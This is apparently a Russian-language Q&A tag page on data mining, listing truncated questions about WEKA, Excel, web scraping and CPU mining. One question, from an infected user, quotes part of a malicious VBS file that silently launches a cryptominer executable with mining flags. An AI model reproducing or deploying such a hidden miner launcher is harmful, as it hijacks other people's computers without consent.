Описание тега data-mining

Интеллектуальный анализ данных - это процесс анализа данных с разных точек зрения и обобщения их в полезную информацию.
1 ответ

Иерархическая структура данных в сводной - пустые строки

У меня есть набор данных со структурой в стиле: Fruit Type Organic Sales Banana 15 Apple Green Apple Organic 20 Apple Red Apple Non-Organic 25 Apple Red Apple Organic 17 Orange California 8 Orange Spain 5 Другими словами, фрукты имеют разные уровни …
25 июн '14 в 13:00
1 ответ

Не удается подключиться к серверу mysql из инструмента WEKA

Мне нужно подключить MySQL сервер из моего инструмента WEKA для анализа некоторых данных. Как я могу сделать это соединение на платформе Linux. Я решил использовать драйвер jdbc для этого, но настройка среды не легка для меня! Как мне это сделать?
03 авг '15 в 20:11
1 ответ

API/ инструмент для добычи неструктурированного текста?

Я хочу создать концептуальную карту из неструктурированного текста. Например Desired input: find "/" -name "*.txt" Desired output: concepts-graph.dot Другими словами, я хочу добыть свои текстовые файлы и создать некое структурированное представление…
12 июн '12 в 02:00
0 ответов

Excel - Как рассчитать истощение по большой базе данных

Я анализирую большую базу данных, в которой мне нужно выяснить, сколько клиентов купили продукт более одного раза, и определить, как долго они "прослужили" как клиенты. Мой набор данных начинается в январе 2014 года и действует до июня 2016 года. Ст…
12 июл '16 в 00:02
1 ответ

Извлечь HTML текстовые файлы в текстовый файл

У меня есть папка с большим количеством HTML-файлов, я хотел бы извлечь только текст, содержащийся в теле этого HTML-файла в текстовый файл, как я могу это сделать?
04 окт '15 в 16:21
2 ответа

Как я могу собрать определенные данные с сайта

Я пытаюсь собрать данные с сайта для исследования. URL-адреса хорошо организованы в формате example.com/x, где x - это возрастающий номер, а все страницы структурированы одинаково. Мне просто нужно взять определенные заголовки и несколько цифр, кото…
0 ответов

Excel извлечение данных удалить слова из ячеек и заменить в другой ячейке

У меня есть данные в столбце под названием "компания", в котором перечислены 3000 компаний вместе с типом компании - будь то LLC, LP, Corp и т. Д. Формат такой: Microsoft_LLC_LLC. Я хочу удалить часть LLC и поместить ее в другой столбец, который на…
20 янв '17 в 04:38
0 ответов

Мой компьютер заражен вирусом майнинга и выдает ошибку хоста скрипта Windows

Первой ошибкой, которую я получил, была ошибка Windows Script Host, описанная как C:\Windows\xdgaudio.vbs Когда я нашел файл, содержимое было Dim WShell Set WShell = CreateObject("WScript.Shell") WShell.Run "wmipvrse.exe -B --donate-level 1 -r 100 -…
04 окт '17 в 18:08
1 ответ

Ошибки страницы, странное поведение памяти и файлов подкачки - особенно, но не конкретно в R

Я должен сказать с самого начала, что я знаю, что я мог бы, вероятно, сделать с еще большим количеством оперативной памяти, так как в настоящее время я использую RStudio в Windows 10 с установленной 4 ГБ оперативной памяти. И пост не обязательно свя…
14 июн '17 в 14:30
0 ответов

Cannot import CSV file to WEKA

Я получил очень большой набор данных из журнала доступа. Я преобразовал его в CSV-файл, используя Vim. Я хочу использовать "WEKA"(инструмент интеллектуального анализа данных) для анализа этого набора данных. Но когда я пытаюсь открыть этот CSV-файл …
01 сен '13 в 10:31
2 ответа

Как я могу очистить только слова слова с веб-сайта?

Я хочу скачать все текстовое содержание с определенного сайта. Сохраните результаты в MS Word, Excel или Notepad и проверьте, какие слова повторяются чаще всего и сколько раз.
3 ответа

Как найти и скопировать все строки, начинающиеся с ( "http://www.") На определенном веб-сайте (1000 страниц)?

Я ищу ссылки (не URL-адреса страниц), написанные в объявлениях о работе на определенном веб-сайте. Я хотел бы отсканировать веб-сайт и скопировать все строки, начинающиеся с http или www, на ВСЕХ страницах (около 1000) Я на Windows 7. Я не знаю, как…
17 мар '12 в 09:25
0 ответов

Объяснение алгоритма, разработанного в статье "Суммирование набора временных рядов путем усреднения"

Я не специалист по информатике и не могу понять алгоритм, приведенный в статье " https://www.sciencedirect.com/science/article/pii/S030439751100822X". Может ли кто-нибудь объяснить мне это упрощенно, пошагово? В настоящее время я пытаюсь извлечь хар…
14 фев '19 в 15:40
0 ответов

Копирование данных с веб-страниц

Есть ли способ выбрать данные по столбцам для Excel из финансовой отчетности, которые доступны в Интернете? Пример веб-страницы: https://www.sec.gov/Archives/edgar/data/1633917/000163391719000118/pypl10-qq12019.htm Как можно было бы копировать данны…
21 май '19 в 06:49
1 ответ

Держать процессор на 100% опасно?

Я - майнер биткойнов, и мой компьютер, к сожалению, не поддерживает майнинг gpu (продолжает ломать мои драйверы), поэтому я использую майнинг cpu. Однако опасно ли держать мой процессор на%100? У меня есть Dell Inspiron 3542 с i5-4210U. (От 1,7 до 2…
13 сен '14 в 14:37
3 ответа

Что такое сообщение "PS Мы работаем над небольшим майнером JavaScript...." на blogspot

Я создал блог, чтобы поделиться некоторыми важными вопросами и ответами с моими друзьями. Но когда я открываю ссылку на блог в интернет-браузере, это показывает какое-то ненормальное поведение, например, когда компьютер работает очень медленно. Сним…
2 ответа

Есть ли способ загрузить значения публичной БД (ASP.NET) на жесткий диск?

Я - исследователь в области социальных наук, и я работаю с данными из различных общедоступных баз данных НПО, правительства и т. Д. Давайте предположим, что у меня нет возможности спросить у администраторов всю базу данных. Однако, если у меня хвати…
09 сен '16 в 10:08
1 ответ

Извлечь весь текст определенного шрифта из документа MS Word?

Я преобразовал документ PDF в формат слова. PDF является выпуском журнала. Мне нужен весь текст с определенным шрифтом и либо 9,5 или 10 баллов. Это содержание статей, на которых я хочу заниматься анализом текста (только частоты слов). Тонны других …
29 ноя '16 в 01:22